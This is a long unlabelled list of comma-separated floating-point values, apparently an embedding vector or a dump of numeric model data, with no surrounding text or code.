0.00020838264026679099, 0.023815728724002838, 0.0036154575645923615, 0.0013667707098647952, 0.014549623243510723, 0.011221486143767834, 0.0063889045268297195, -0.0008095871307887137, -0.004772723186761141, 0.038532957434654236, 0.006779980380088091, -0.03744751960039139, 0.03272268548607826, 0.011133694089949131, 0.00793724600225687, -0.0004020500637125224, 0.01709560677409172, -0.015475435182452202, -0.024166898801922798, 0.04220428317785263, 0.0006873758975416422, -0.04108692333102226, -0.042427752166986465, -0.0053234221413731575, -0.007318707648664713, 0.019617648795247078, 0.03425506502389908, 0.041757337749004364, 0.009250144474208355, 0.023560332134366035, 0.002196809509769082, -0.00786940660327673, 0.021165989339351654, 0.02020825259387493, 0.010503184050321579, 0.0017428819555789232, -0.06685005128383636, -0.036872878670692444, -0.015148208476603031, -0.04609907791018486, -0.0071191792376339436, -0.0237518809735775, 0.015427548438310623, -0.0022427011281251907, 0.0184843260794878, 0.018580099567770958, 0.046641796827316284, -0.02727954462170601, 0.007286783307790756, -0.033361174166202545, 0.02408708818256855, 0.00531544117256999, 0.026066411286592484, -0.025060787796974182, 0.01819700561463833, -0.04680142179131508, 0.02686452493071556, -0.014390000142157078, 0.009752956219017506, -0.0011572656221687794, -0.05401637405157089, 0.010774542577564716, -0.029131170362234116, -0.003974609076976776, 0.020687121897935867, 0.015810644254088402, -0.02095847949385643, -0.008268463425338268, 0.029258867725729942, 0.033648498356342316, -0.0022526774555444717, -0.049068063497543335, 0.024549994617700577, 0.0032363533973693848, -0.029147133231163025, -0.03735174611210823, 0.021565048024058342, -0.03620246425271034, 0.010295674204826355, -0.010567032732069492, 0.02300165221095085, -0.014948680065572262, -0.031222229823470116, -0.007973161526024342, -0.06333834677934647, -0.03214804083108902, -0.0030627634841948748, 0.028795963153243065, 0.010207881219685078, -0.019314365461468697, -0.01960168592631817, 0.009545446373522282, 0.002745513105764985, 0.023448597639799118, -0.0033620563335716724, -0.04293854534626007, -0.00046440272126346827, 0.002807366894558072, -0.010590976104140282, 0.0015114288544282317, 0.052579768002033234, -0.005471073091030121, 0.028205357491970062, 0.015299850143492222, 0.004481411539018154, -0.012083449400961399, 0.0061095645651221275, 0.027455130591988564, -0.038916051387786865, 0.041725412011146545, -0.035755518823862076, 0.017207343131303787, 0.014621453359723091, -0.0006893711979500949, 0.010032296180725098, 0.013998923823237419, -0.00012507947394624352, -0.027311470359563828, -0.01711156964302063, -0.0063849142752587795, 0.014533660374581814, 0.0023484511766582727, 0.010295674204826355, -0.0244222953915596, -0.0453328900039196, 0.002152913250029087, -0.00020962969574611634, -0.050504669547080994, 0.023480521515011787, -0.021405424922704697, 0.009050616063177586, 0.03585129231214523, -0.01677636243402958, 0.01450173556804657, 0.0216608215123415, 0.014286245219409466, 0.038947977125644684, 0.04191695898771286, 0.02413497492671013, -0.03431891277432442, 0.04996195062994957, -0.0404803566634655, -0.03939491882920265, -0.022171614691615105, -0.003723202971741557, 0.0004843555798288435, -0.02483731508255005, 0.04303431883454323, -0.027503017336130142, 0.04826994985342026, 0.05312248319387436, -0.008994747884571552, 0.03355272486805916, -0.003549613058567047, 0.022203538566827774, -0.0047128647565841675, -0.025220410898327827, 0.012139317579567432, -0.04226813092827797, 0.011923827230930328, 0.011021957732737064, -0.04111884534358978, -0.0063011120073497295, 0.0065644895657896996, 0.06665850430727005, 0.03238747641444206, 0.0011961737181991339, -0.0044494871981441975, 0.030280454084277153, -0.012650110758841038, -0.015267925336956978, 0.014765113592147827, 0.020703082904219627, -0.02269836887717247, 0.0059858569875359535, 0.012570299208164215, 0.018963195383548737, 0.036489784717559814, -0.016888096928596497, 0.015587171539664268, 0.02544388175010681, 0.013703621923923492, 0.00013131473679095507, -0.012881563976407051, -0.010886278003454208, -0.018755685538053513, -0.021469272673130035, 0.027694564312696457, -0.0081966333091259, -0.028891736641526222, 0.026449507102370262, -0.027040110900998116, 0.0053593371994793415, -0.02825324423611164, -0.030998757109045982, -0.01854817569255829, -0.0023823711089789867, -0.00978488102555275, -0.021932179108262062, -0.05066429451107979, -0.003757122904062271, -0.032259777188301086, 0.012817715294659138, 0.00007694320083828643, 0.012195185758173466, -0.005538912955671549, -0.04255545139312744, 0.009513521566987038, 0.005111921578645706, 0.007530208211392164, 0.04028880596160889, -0.011812090873718262, 0.0152200385928154, 0.035117026418447495, 0.016050077974796295, 0.004493383225053549, -0.0536971278488636, 0.01240269560366869, -0.03971416503190994, 0.0030567776411771774, 0.0321161188185215, 0.022139688953757286, 0.010958109050989151, -0.014900793321430683, 0.0057623847387731075, 0.006831857841461897, 0.001080447225831449, -0.022171614691615105, 0.009713050909340382, -0.011907864362001419, -0.0034817734267562628, -0.023496484383940697, -0.008236539550125599, -0.005658630281686783, -0.0446624755859375, -0.015236001461744308, -0.00008492434426443651, -0.004321788903325796, 0.011836034245789051, 0.03419121354818344, -0.010191919282078743, -0.055006034672260284, -0.05264361575245857, 0.018739722669124603, 0.0023085454013198614, -0.00033770210575312376, 0.0024522060994058847, 0.045524436980485916, 0.009976428002119064, 0.007594057358801365, -0.031924571841955185, 0.02233123779296875, -0.015635058283805847, 0.016983872279524803, -0.031158380210399628, -0.035787444561719894, 0.06177404522895813, -0.004529298283159733, -0.027119921520352364, -0.012562318705022335, -0.017542552202939987, 0.014262301847338676, 0.0061255269683897495, -0.0010021321941167116, -0.03071143664419651, 0.012594242580235004, -0.007262839935719967, 0.03106260672211647, 0.026050448417663574, -0.0040185051038861275, -0.038596805185079575, 0.017925646156072617, -0.018436439335346222, -0.014429905451834202, 0.0020471629686653614, 0.04629062861204147, 0.005355346482247114, -0.022921841591596603, -0.02577909082174301, 0.005702526308596134, -0.0141745088621974, -0.031988419592380524, 0.008659539744257927, -0.001857610885053873, 0.03291423246264458, -0.000640985497739166, 0.019122818484902382, -0.02201199159026146, -0.012745884247124195, -0.0071351416409015656, 0.035372424870729446, -0.054271768778562546, -0.009920559823513031, -0.011812090873718262, 0.0342869870364666, 0.0032383485231548548, 0.02198006585240364, 0.028093621134757996, -0.03042411617934704, 0.026305845007300377, -0.020495574921369553, 0.03747944533824921, 0.026066411286592484, -0.030871059745550156, -0.004389628302305937, 0.034733932465314865, 0.03840525820851326, 0.016664626076817513, -0.027407243847846985, -0.012769828550517559, -0.003146565519273281, -0.025012901052832603, -0.016505002975463867, 0.008228558115661144, -0.03594706580042839, -0.014358075335621834, 0.005910036154091358, -0.009569389745593071, 0.0002563942107371986, 0.004457468166947365, -0.028045734390616417, -0.01846836321055889, -0.001787775894626975, -0.008156727999448776, 0.04351319000124931, -0.00786940660327673, -0.005159808788448572, -0.011133694089949131, -0.006436791270971298, -0.00035141967236995697, 0.013990943320095539, -0.01715945638716221, 0.02055942267179489, 0.015132246538996696, 0.011652467772364616, 0.025683317333459854, 0.0048006572760641575, -0.005546893924474716, 0.00871540792286396, -0.0010624895803630352, -0.0015892450464889407, -0.015092340297996998, -0.011955751106142998, 0.04447092488408089, 0.0015243982197716832, -0.005107931327074766, -0.007570113521069288, 0.013543998822569847, -0.005091968923807144, 0.010798485949635506, 0.013751508668065071, 0.02407112531363964, -0.0192345529794693, -0.038532957434654236, 0.0439920574426651, 0.003904774086549878, 0.022155651822686195, -0.008651558309793472, 0.006791952531784773, -0.008523860014975071, -0.01101397629827261, 0.026002561673521996, -0.008531841449439526, -0.0053752996027469635, 0.010191919282078743, 0.03291423246264458, -0.0027834235224872828, 0.010263749398291111, 0.001848632120527327, 0.006245243828743696, -0.012650110758841038, 0.02863634005188942, -0.018037382513284683, -0.0014286244986578822, -0.010471259243786335, 0.003968623001128435, 0.0010974070755764842, -0.0003693772596307099, 0.004692911636084318, -0.025603504851460457, -0.01642519049346447, 0.0006883735186420381, -0.02938656695187092, -0.014836943708360195, 0.010471259243786335, 0.0024781448300927877, -0.01741485297679901, -0.021054254844784737, -0.026353733614087105, -0.006376932840794325, 0.013224753551185131, -0.02447018399834633, 0.04434322938323021, -0.03074336051940918, 0.01447779219597578, -0.010096145793795586, 0.0049562896601855755, 0.011692374013364315, 0.023879578337073326, -0.016145851463079453, 0.0006923641194589436, -0.006775990128517151, 0.03111049346625805, 0.004497373942285776, 0.0016381294699385762, 0.05784732103347778, 0.018372589722275734, -0.01746273972094059, 0.0039207362569868565, -0.0122111476957798, -0.020527498796582222, 0.00037735840305685997, -0.012953394092619419, -0.0022027953527867794, -0.04057613015174866, -0.027694564312696457, 0.015236001461744308, 0.009401786141097546, 0.046577949076890945, 0.003505716798827052, 0.00944169145077467, -0.0153876431286335, 0.0034837687853723764, -0.026273921132087708, -0.008691464550793171, -0.015180133283138275, 0.03104664385318756, -0.02095847949385643, 0.011205524206161499, -0.022171614691615105, -0.0036314199678599834, -0.013240715488791466, 0.041725412011146545, 0.0014805019600316882, -0.006356980185955763, 0.0006165432860143483, 0.0032822447828948498, 0.011548712849617004, -0.012163260951638222, 0.021549085155129433, -0.023847654461860657, 0.036138612776994705, -0.02308146469295025, 0.022570671513676643, -0.019442062824964523, 0.01782987266778946, 0.0071511035785079, -0.0011722303461283445, -0.0226664450019598, -0.024980975314974785, 0.008635596372187138, -0.005399242974817753, 0.024502107873558998, -0.004649015609174967, 0.01709560677409172, 0.005646658129990101, 0.01749466359615326, 0.013863245025277138, 0.0336165726184845, -0.006169422995299101, -0.005451120436191559, 0.00122111476957798, 0.027742451056838036, 0.022203538566827774, 0.006113555282354355, 0.022490859031677246, 0.011668430641293526, -0.0005881104152649641, 0.00244222953915596, 0.0014745161170139909, -0.0029530227184295654, -0.013057149015367031, -0.036872878670692444, 0.0006754042115062475, 0.010766561143100262, 0.013743527233600616, -0.00671613123267889, -0.010359522886574268, 0.003743155859410763, 0.009393804706633091, -0.03866065293550491, 0.004333760589361191, 0.005415205378085375, -0.02273029461503029, 0.023815728724002838, 0.01781390979886055, 0.0057783471420407295, 0.01889934577047825, 0.019984781742095947, 0.0030208623502403498, -0.02274625562131405, 0.034414686262607574, -0.037894465029239655, 0.02790207415819168, 0.011724298819899559, 0.04073575139045715, 0.0067041595466434956, -0.01592237874865532, 0.0028233290649950504, 0.0002636271237861365, -0.003148560645058751, 0.009633239358663559, -0.021165989339351654, -0.010774542577564716, 0.00017882748215924948, 0.008795219473540783, 0.0047687324695289135, -0.0018905331380665302, 0.025539657101035118, -0.013304565101861954, 0.03168513625860214, -0.01202758215367794, 0.009130426682531834, 0.021038291975855827, -0.03206823021173477, 0.01083839125931263, -0.02129368856549263, 0.01187594048678875, -0.013512074016034603, 0.0059539321810007095, 0.005267553962767124, -0.01886742189526558, -0.008779256604611874, 0.01988900639116764, -0.02403920143842697, -0.024262674152851105, -0.004980233032256365, 0.005303469020873308, 0.012857620604336262, -0.03342502564191818, -0.003809000365436077, 0.007406500168144703, 0.022235462442040443, -0.01414258498698473, -0.0023045549169182777, -0.004760751500725746, 0.00839616172015667, -0.003904774086549878, 0.05098353698849678, -0.03171706199645996, -0.012123355641961098, 0.029450416564941406, -0.03066354990005493, 0.03179687261581421, -0.020367875695228577, -0.0029091264586895704, -0.01644115336239338, -0.0045891571789979935, -0.0017817900516092777, 0.008986766450107098, -0.001247053500264883, -0.020719045773148537, 0.013160903938114643, -0.02935464307665825, -0.025715241208672523, -0.004084349609911442, 0.0015024500899016857, -0.037543293088674545, 0.011109750717878342, 0.00531943142414093, 0.028333056718111038, -0.00943371094763279, 0.026736827567219734, -0.005467082839459181, -0.03326540067791939, 0.02654528059065342, 0.010886278003454208, 0.0024362436961382627, 0.0030667539685964584, -0.0013966999249532819, 0.00993652269244194, 0.0042978450655937195, -0.010527127422392368, 0.014621453359723091, 0.016935983672738075, -0.020064592361450195, 0.012099412269890308, 0.024166898801922798, -0.009816804900765419, 0.0076100192964077, -0.014485773630440235, -0.01519609522074461, 0.021181952208280563, -0.02999313361942768, 0.014661358669400215, 0.015587171539664268, -0.016329417005181313, 0.003741160500794649, 0.026800677180290222, 0.0046450248919427395, -0.010367504321038723, -0.013312545605003834, 0.014006905257701874, 0.014964642003178596, -0.010575014166533947, -0.04536481574177742, -0.022283349186182022, 0.0030148765072226524, -0.015730831772089005, 0.0032463297247886658, -0.03342502564191818, -0.018787609413266182, 0.03348887339234352, 0.004912393167614937, -0.014852906577289104, 0.011923827230930328, 0.013559960760176182, 0.019761309027671814, 0.02410305105149746, 0.0213256124407053, 0.014597509987652302, -0.015140227042138577, 0.02204391546547413, 0.02411901205778122, 0.012330865487456322, 0.0020072574261575937, -0.029067320749163628, -0.012650110758841038, -0.00734664173796773, -0.005303469020873308, -0.00037710898322984576, 0.017893722280859947, 0.006436791270971298, -0.017670249566435814, -0.005662620533257723, 0.004194090608507395, 0.0046091098338365555, -0.008523860014975071, 0.017255229875445366, 0.011468902230262756, 0.032674796879291534, -0.02126176469027996, 0.010247787460684776, 0.02336878515779972, -0.023672068491578102, 0.01081444788724184, -0.009912579320371151, -0.008906954899430275, -0.010750599205493927, -0.012650110758841038, -0.005646658129990101, -0.027327431365847588, -0.03601091355085373, 0.0021988048683851957, 0.027997847646474838, -0.014286245219409466, 0.004517326597124338, -0.043098170310258865, -0.00697551853954792, 0.0017508631572127342, -0.02234719879925251, -0.0027914047241210938, -0.022235462442040443, 0.011317260563373566, -0.00778161408379674, 0.027455130591988564, -0.013504093512892723, -0.012769828550517559, -0.031924571841955185, -0.006241253577172756, -0.011061863973736763, -0.004980233032256365, -0.014621453359723091, -0.01674443669617176, -0.013855263590812683, -0.03257902339100838, -0.0012350818142294884, 0.01917070522904396, 0.036840952932834625, -0.0009138408349826932, 0.029594076797366142, -0.021788518875837326, 0.023608218878507614, -0.01099003292620182, -0.014653378166258335, -0.0028572489973157644, 0.0028911689296364784, -0.021469272673130035, 0.0014316174201667309, 0.0002840787929017097, -0.029179057106375694, -0.011428995989263058, 0.0021768566220998764, 0.011484864167869091, -0.010894259437918663, -0.01619373820722103, 0.010790504515171051, -0.019713422283530235, -0.024246711283922195, -0.00993652269244194, 0.009481597691774368, 0.0523562952876091, -0.03457431122660637, 0.011277354322373867, 0.01031163614243269, 0.04303431883454323, -0.0032223863527178764, -0.01741485297679901, 0.01846836321055889, -0.022458935156464577, -0.0067001692950725555, 0.01627354882657528, 0.009689106605947018, -0.014038830064237118, -0.017670249566435814, -0.02507675066590309, -0.010399429127573967, -0.0033680421765893698, -0.011229467578232288, -0.01889934577047825, -0.014557603746652603, 0.004110288340598345, 0.008787238039076328, 0.019266478717327118, 0.01889934577047825, -0.023528408259153366, 0.006097592879086733, 0.009114464744925499, 0.0012580276234075427, 0.009258124977350235, 0.015666982159018517, 0.001159260980784893, 0.01779794879257679, 0.01679232344031334, 0.019394176080822945, 0.02972177416086197, -0.028029773384332657, -0.0060936021618545055, -0.005678582936525345, -0.010966089554131031, 0.0037810662761330605, 0.021453311666846275, -0.023624181747436523, 0.020048629492521286, -0.0046250722371041775, -0.01671251282095909, 0.01950591243803501, -0.013807376846671104, 0.0009038643911480904, 0.020798858255147934, -0.013751508668065071, 0.02965792641043663, -0.05839003995060921, -0.010694731026887894, -0.03447853401303291, -0.004736808128654957, -0.011564675718545914, -0.02065519616007805, -0.028444791212677956, -0.004265920724719763, 0.016161814332008362, 0.023129351437091827, 0.023672068491578102, 0.02727954462170601, 0.0034458583686500788, 0.019617648795247078, -0.022442972287535667, -0.022602595388889313, -0.04705681651830673, -0.010279711335897446, -0.009665163233876228, 0.0064208293333649635, -0.0059180171228945255, 0.025587543845176697, -0.014749151654541492, 0.027694564312696457, 0.02065519616007805, -0.00005424682967714034, 0.010167975910007954, -0.03553204610943794, 0.015036472119390965, -0.03840525820851326, -0.011165618896484375, 0.015810644254088402, 0.03307385370135307, -0.028173433616757393, 0.008467991836369038, 0.005107931327074766, 0.01743081584572792, -0.012362789362668991, -0.010918202809989452, 0.01779794879257679, -0.013232734054327011, 0.010870316065847874, -0.0092421630397439, 0.009202257730066776, -0.03463815897703171, -0.0336165726184845, 0.021118102595210075, 0.033999666571617126, 0.0037990238051861525, -0.017590438947081566, -0.014765113592147827, -0.008659539744257927, 0.007805557455867529, 0.004585166461765766, 0.002815348096191883, -0.014342113398015499, -0.0369686521589756, 0.011173599399626255, -0.007099226117134094, 0.04479017108678818, -0.015914399176836014, -0.014286245219409466, 0.0009826781461015344, -0.026704903692007065, -0.027407243847846985, 0.016002191230654716, -0.00891493633389473, -0.0027056073304265738, 0.0009996381122618914, -0.012322884052991867, -0.044151682406663895, -0.027758413925766945, -0.012267015874385834, 0.007542179897427559, 0.0008080906700342894, 0.01275386568158865, -0.007426453288644552, -0.0067879618145525455, 0.004525308031588793, 0.00679993350058794, -0.0226664450019598, 0.007905322127044201, -0.01620970107614994, 0.014573566615581512, -0.010998014360666275, -0.03149358928203583, 0.0022646491415798664, -0.0029769660905003548, 0.007769642397761345, -0.010511164553463459, -0.012817715294659138, -0.03482970595359802, 0.002432253211736679, -0.005826233886182308, 0.018244892358779907, 0.011692374013364315, -0.0030388201121240854, -0.0031924571376293898, -0.0017049715388566256, -0.027694564312696457, -0.0028013810515403748, -0.01083041075617075, -0.0014435891062021255, 0.006468716077506542, 0.11128905415534973, -0.008096869103610516, -0.007993114180862904, 0.0061774044297635555, 0.0033720326609909534, -0.0052555822767317295, 0.04335356503725052, -0.002998914336785674, 0.018085269257426262, 0.013472168706357479, 0.036521706730127335, 0.0049562896601855755, 0.0008060953696258366, -0.0009263113606721163, 0.004964270628988743, 0.01958572305738926, -0.018723759800195694, 0.012530393898487091, 0.007985132746398449, 0.019713422283530235, -0.007905322127044201, 0.003364051692187786, -0.0016321436269208789, -0.002302559558302164, -0.010159994475543499, -0.0008918927051126957, 0.003916745539754629, -0.013719583861529827, -0.01921859197318554, -0.014988585375249386, -0.009385823272168636, -0.03425506502389908, -0.0009058596915565431, -0.0265133548527956, 0.015435529872775078, 0.021852368488907814, 0.0025918760802596807, -0.013919112272560596, 0.0009582359343767166, -0.031557437032461166, 0.008531841449439526, 0.012418657541275024, -0.019777271896600723, 0.035372424870729446, -0.007861425168812275, -0.00007862672646297142, -0.010774542577564716, -0.0011083811987191439, -0.0042778924107551575, 0.019761309027671814, -0.0033361176028847694, -0.03238747641444206, 0.011987675912678242, 0.014980604872107506, 0.002693635644391179, 0.018308740109205246, 0.0027076026890426874, -0.0011742255883291364, 0.014158546924591064, -0.009042634628713131, -0.01063886284828186, 0.0057623847387731075, 0.007358613424003124, 0.006640310399234295, -0.0061813946813344955, -0.019362252205610275, -0.01715945638716221, -0.003587523475289345, -0.032978080213069916, 0.012155280448496342, 0.024581918492913246, -0.010854354128241539, -0.0050121573731303215, -0.0017319079488515854, 0.000208133234991692, 0.01816507987678051, -0.0002995422692038119, 0.0008345282403752208, -0.0060058096423745155, -0.006576461251825094, -0.0134242819622159, 0.030519889667630196, -0.03326540067791939, -0.0014675325946882367, -0.009210238233208656, 0.027838224545121193, -0.03109453059732914, -0.007027396000921726, 0.026960300281643867, -0.010918202809989452, 0.010910222306847572, 0.01671251282095909, 0.016888096928596497, 0.035819366574287415, -0.001875568530522287, 0.017398890107870102, 0.011676411144435406, -0.01153275091201067, -0.015970265492796898, -0.0018426462775096297, -0.0007197993109002709, 0.0020890641026198864, 0.035053178668022156, 0.009729012846946716, 0.0008599681314080954, 0.0065086218528449535, 0.027119921520352364, 0.013168885372579098, -0.00723490584641695, -0.001639127149246633, -0.028540566563606262, 0.0024561965838074684, 0.009840749204158783, -0.001865592086687684, -0.007282792590558529, -0.00019715915550477803, 0.018691835924983025, -0.0014805019600316882, 0.014214415103197098, -0.0076738684438169, -0.033999666571617126, -0.028780000284314156, 0.013472168706357479, -0.014661358669400215, 0.03971416503190994, -0.010351541452109814, -0.003964632749557495, -0.02410305105149746, 0.026369694620370865, 0.02239508554339409, 0.0045731947757303715, 0.0026657015550881624, 0.015467454679310322, 0.017670249566435814, 0.0069116693921387196, 0.010247787460684776, 0.010590976104140282, 0.030120832845568657, -0.011548712849617004, 0.011277354322373867, -0.03316962718963623, 0.0356278195977211, -0.006133507937192917, -0.009744974784553051, -0.004529298283159733, -0.016632700338959694, -0.008819162845611572, 0.017015796154737473, 0.0046091098338365555, -0.011397071182727814, 0.022107765078544617, -0.02656124159693718, 0.026657016947865486, -0.0028791972436010838, -0.0064567443914711475, -0.009744974784553051, 0.007753679994493723, -0.003505716798827052, -0.01883549615740776, 0.002091059461236, 0.031286079436540604, 0.007019415032118559, -0.005714497994631529, 0.019410138949751854, -0.002041177125647664, 0.013615828938782215, -0.021453311666846275, -0.047599535435438156, -0.02129368856549263, 0.0029929284937679768, -0.0017807924887165427, -0.004389628302305937, -0.005091968923807144, 0.0049403272569179535, 0.017207343131303787, -0.0056546395644545555, 0.003042810596525669, -0.008420105092227459, 0.05143048241734505, -0.01431817002594471, -0.01099003292620182, 0.00470887403935194, -0.02194814197719097, 0.006081630475819111, 0.017526589334011078, 0.021022329106926918, 0.000967713538557291, 0.020671159029006958, -0.031222229823470116, 0.012674054130911827, -0.011867959052324295, 0.059188153594732285, -0.0192345529794693, 0.0195697620511055, 0.018915308639407158, -0.0018625991651788354, -0.015283888205885887, 0.008076916448771954, 0.008531841449439526, -0.015355718322098255, 0.010734636336565018, -0.00406439695507288, -0.0006938605802133679, -0.0058980644680559635, 0.0019134789472445846, -0.034765858203172684, -0.00723889609798789, -0.03987378999590874, -0.00909052137285471, -0.0022207528818398714, -0.004084349609911442, -0.013559960760176182, -0.004704883322119713, 0.00040254887426272035, 0.03237151354551315, -0.0015593157149851322, -0.010255767963826656, -0.033712346106767654, 0.006484678480774164, -0.019793232902884483, 0.0006978511810302734, 0.011923827230930328, 0.00041452058940194547, -0.03304193168878555, 0.028189394623041153, 0.023863615468144417, 0.016050077974796295, -0.03184475749731064, 0.016999833285808563, 0.008707426488399506, -0.005155818071216345, -0.006436791270971298, -0.00837221834808588, 0.00020364383817650378, 0.00031475629657506943, -0.015283888205885887, 0.027056073769927025, 0.0062332721427083015, -0.007510255090892315, -0.00024978481815196574, 0.013966999016702175, -0.014374038204550743, -0.007302745245397091, -0.009641219861805439, -0.0010275720851495862, -0.00012302183313295245, 0.02196410484611988, -0.0016331413062289357, -0.021389462053775787, 0.007649925071746111, 0.0030128813814371824, -0.008635596372187138, 0.006971527822315693, -0.00871540792286396, -0.0044335247948765755, 0.012626167386770248, -0.012043544091284275, 0.020128441974520683, -0.010088164359331131, -0.0058980644680559635, 0.009361879900097847, -0.004142213147133589, 0.014062773436307907, 0.017351003363728523, -0.009449672885239124, 0.02308146469295025, -0.010966089554131031, -0.004565213341265917, 0.01307311188429594, -0.019346289336681366, 0.01521205808967352, 0.014086716808378696, 0.017366966232657433, -0.005910036154091358, -0.018723759800195694, -0.0022466916125267744, 0.003818976692855358, -0.01988900639116764, 0.005702526308596134, -0.019458025693893433, -0.015180133283138275, 0.054686788469552994, 0.01521205808967352, -0.03415929153561592, 0.021357538178563118, -0.04852534830570221, -0.03146166354417801, -0.02758282795548439, -0.010455296374857426, 0.020415762439370155, -0.0032583014108240604, -0.020766932517290115, -0.0042619300074875355, -0.02411901205778122, -0.011413034051656723, 0.029945246875286102, 0.0053393845446407795, 0.026672977954149246, -0.019282439723610878, 0.004561223089694977, 0.009465634822845459, 0.012099412269890308, 0.004028481896966696, 0.019043006002902985, -0.029562152922153473, -0.005487035494297743, 0.007789595052599907, -0.03802216425538063, 0.013751508668065071, 0.020431725308299065, -0.0024482153821736574, -0.026034487411379814, 0.006971527822315693, 0.005295488052070141, -0.013639772310853004, 0.008068935014307499, 0.020495574921369553, -0.006835848558694124, -0.012458563782274723, 0.005227648187428713, 0.010694731026887894, -0.023640144616365433, -0.03591514006257057, -0.01556322816759348, 0.0063011120073497295, -0.021405424922704697, -0.00152539589907974, -0.011899883858859539, 0.0026836590841412544, -0.022602595388889313, 0.01712753251194954, 0.00354362721554935, 0.004561223089694977, -0.007167065981775522, -0.010223843157291412, -0.04351319000124931, 0.01533975638449192, -0.004150194115936756, -0.028476716950535774, 0.012737903743982315, -0.040991149842739105, 0.016840210184454918, -0.0056187245063483715, 0.0035516084171831608, 0.0050121573731303215, -0.006221300456672907, -0.0034159289207309484, 0.01751062646508217, -0.011253410950303078, -0.013863245025277138, -0.019681498408317566, 0.013057149015367031, 0.020830782130360603, 0.020160365849733353, 0.023911502212285995, -0.005267553962767124, -0.02619411051273346, 0.03668133169412613, 0.0021070216316729784, -0.0036314199678599834, -0.023991314694285393, 0.00732269836589694, -0.013783433474600315, 0.020687121897935867, 0.005718488711863756, -0.011620543897151947, -0.0059499419294297695, 0.028045734390616417, 0.01850028894841671, 0.003699259599670768, -0.013144942000508308, -0.017909683287143707, -0.004509345628321171, 0.02127772569656372, -0.02515656128525734, 0.01627354882657528, 0.005475063808262348, -0.01987304538488388, 0.0038668636698275805, 0.006297121290117502, -0.03795831277966499, -0.045588284730911255, 0.0011353174922987819, 0.024677691981196404, -0.0030487964395433664, 0.006484678480774164, -0.0005716493469662964, -0.0056386771611869335, -0.013192828744649887, -0.02932271733880043, 0.015355718322098255, 0.0023943427950143814, 0.0009771911427378654, 0.0371282733976841, 0.010167975910007954, 0.0545271672308445, 0.0004753768153022975, -0.002015238394960761, -0.023640144616365433, -0.00063200673321262, 0.03419121354818344, -0.019442062824964523, -0.008244520053267479, 0.008356256410479546, -0.002623800653964281, 0.0013188838493078947, -0.009202257730066776, -0.01115763746201992, 0.03760714456439018, -0.022490859031677246, 0.03342502564191818, 0.0047687324695289135, -0.002372394548729062, 0.007023405283689499, -0.01185199711471796, 0.021022329106926918, 0.004964270628988743, 0.021150028333067894, 0.0026457486674189568, -0.016337398439645767, 0.006392895244061947, -0.005471073091030121, -0.01992093212902546, -0.016489040106534958, 0.014956661500036716, -0.022123727947473526, -0.0036294246092438698, -0.01743081584572792, -0.018963195383548737, -0.010766561143100262, -0.008168699219822884, -0.011716317385435104, 0.007594057358801365, 0.026768751442432404, 0.02961003966629505, 0.02062327228486538, 0.0019563776440918446, -0.0020631253719329834, -0.015954304486513138, 0.004006533417850733, 0.0041222600266337395, -0.005052063148468733, -0.022570671513676643, 0.014038830064237118, -0.019649572670459747, -0.024326521903276443, -0.0025838948786258698, 0.011740260757505894, -0.0063889045268297195, -0.011117731221020222, 0.015140227042138577, 0.0009123443742282689, 0.02866826392710209, 0.009872673079371452, 0.004720845725387335, 0.015914399176836014, -0.00038184778532013297, 0.010758579708635807, -0.0036493774969130754, 0.037830617278814316, -0.015826605260372162, -0.0035975000355392694, 0.01955379918217659, 0.004002543166279793, 0.0027574847918003798, 0.01886742189526558, 0.0005462094559334219, -0.0022167623974382877, -0.008100859820842743, -0.016177775338292122, 0.014358075335621834, -0.012793771922588348, 0.013998923823237419, -0.008954841643571854, 0.02973773702979088, -0.0041541848331689835, -0.004585166461765766, -0.014030848629772663, 0.0005327412509359419, -0.01671251282095909, -0.0055349222384393215, 0.008787238039076328, -0.010255767963826656, 0.0045372797176241875, -0.01711156964302063, 0.022842029109597206, 0.0048525347374379635, 0.0026198099367320538, 0.0017408867133781314, 0.02865230105817318, 0.029897360131144524, 0.004900421481579542, 0.0018965189810842276, 0.024374408647418022, 0.007438424974679947, 0.009186294861137867, 0.003382009221240878, -0.0028732114005833864, 0.020335951820015907, -0.0144698116928339, -0.02092655561864376, -0.015307831577956676, 0.0059539321810007095, -0.000007988936886249576, 0.008683483116328716, 0.03393581882119179, -0.01587449200451374, 0.020878668874502182, 0.0054630921222269535, -0.009058596566319466, -0.0030727398116141558, -0.00005044331555836834, -0.009058596566319466, 0.007099226117134094, -0.009561409242451191, -0.015603133477270603, -0.007941236719489098, -0.007809548173099756, 0.02439037151634693, -0.01308109238743782, 0.015587171539664268, 0.01415056549012661, 0.010590976104140282, -0.020719045773148537, -0.0008070930489338934, 0.021533122286200523, 0.01915474236011505, 0.005977875553071499, -0.020399799570441246, -0.014964642003178596, -0.003735174657776952, -0.00033745268592610955, -0.006065668538212776, -0.029482340440154076, -0.006217310205101967, -0.007801566738635302, 0.0038169813342392445, -0.0054271770641207695, 0.008467991836369038, -0.013001280836760998, 0.005981866270303726, -0.004309816751629114, 0.005774356424808502, 0.03738367184996605, -0.0060217720456421375, -0.00470887403935194, -0.00044469928252510726, -0.007733727339655161, -0.00793724600225687, -0.0020731016993522644, 0.007562132552266121, -0.018659912049770355, 0.0041382224299013615, -0.0012081454042345285, -0.006608386058360338, -0.0010475249728187919, -0.02126176469027996, -0.018931269645690918, -0.016473079100251198, -0.0016790328081697226, 0.002144932048395276, 0.001072466024197638, 0.020862706005573273, -0.016872135922312737, 0.008683483116328716, -0.008052973076701164, -0.003793037962168455, -0.012043544091284275, 0.010104126296937466, -0.011836034245789051, 0.0041222600266337395, -0.0041741374880075455, 0.0028372961096465588, 0.0019304389134049416, -0.011053882539272308, 0.0045053549110889435, 0.017718136310577393, -0.011492845602333546, 0.0244222953915596, -0.007773632649332285, 0.01185997761785984, -0.0037291888147592545, -0.018404515460133553, 0.0046250722371041775, -0.024565957486629486, -0.0029689851216971874, 0.014916755259037018, 0.02022421546280384, -0.014278263784945011, 0.0047807046212255955, 0.00235443701967597, 0.03104664385318756, -0.003569565946236253, 0.006348998751491308, -0.006297121290117502, -0.008819162845611572, -0.030168719589710236, -0.010678769089281559, -0.003846910782158375, -0.002111012116074562, 0.009106483310461044, 0.010024314746260643, 0.006261206232011318, -0.0017728112870827317, -0.011524769477546215, -0.003725198330357671, 0.0050281197763979435, -0.014637415297329426, -0.017526589334011078, -0.015962285920977592, -0.016161814332008362, 0.001385725918225944, 0.009665163233876228, -0.009633239358663559, -0.010072201490402222, -0.02062327228486538, -0.016313455998897552, -0.018085269257426262, -0.017271192744374275, -0.007841472513973713, 0.0021150028333067894, -0.023464558646082878, -0.000177705122041516, 0.0020890641026198864, 0.014198452234268188, -0.007270820904523134, 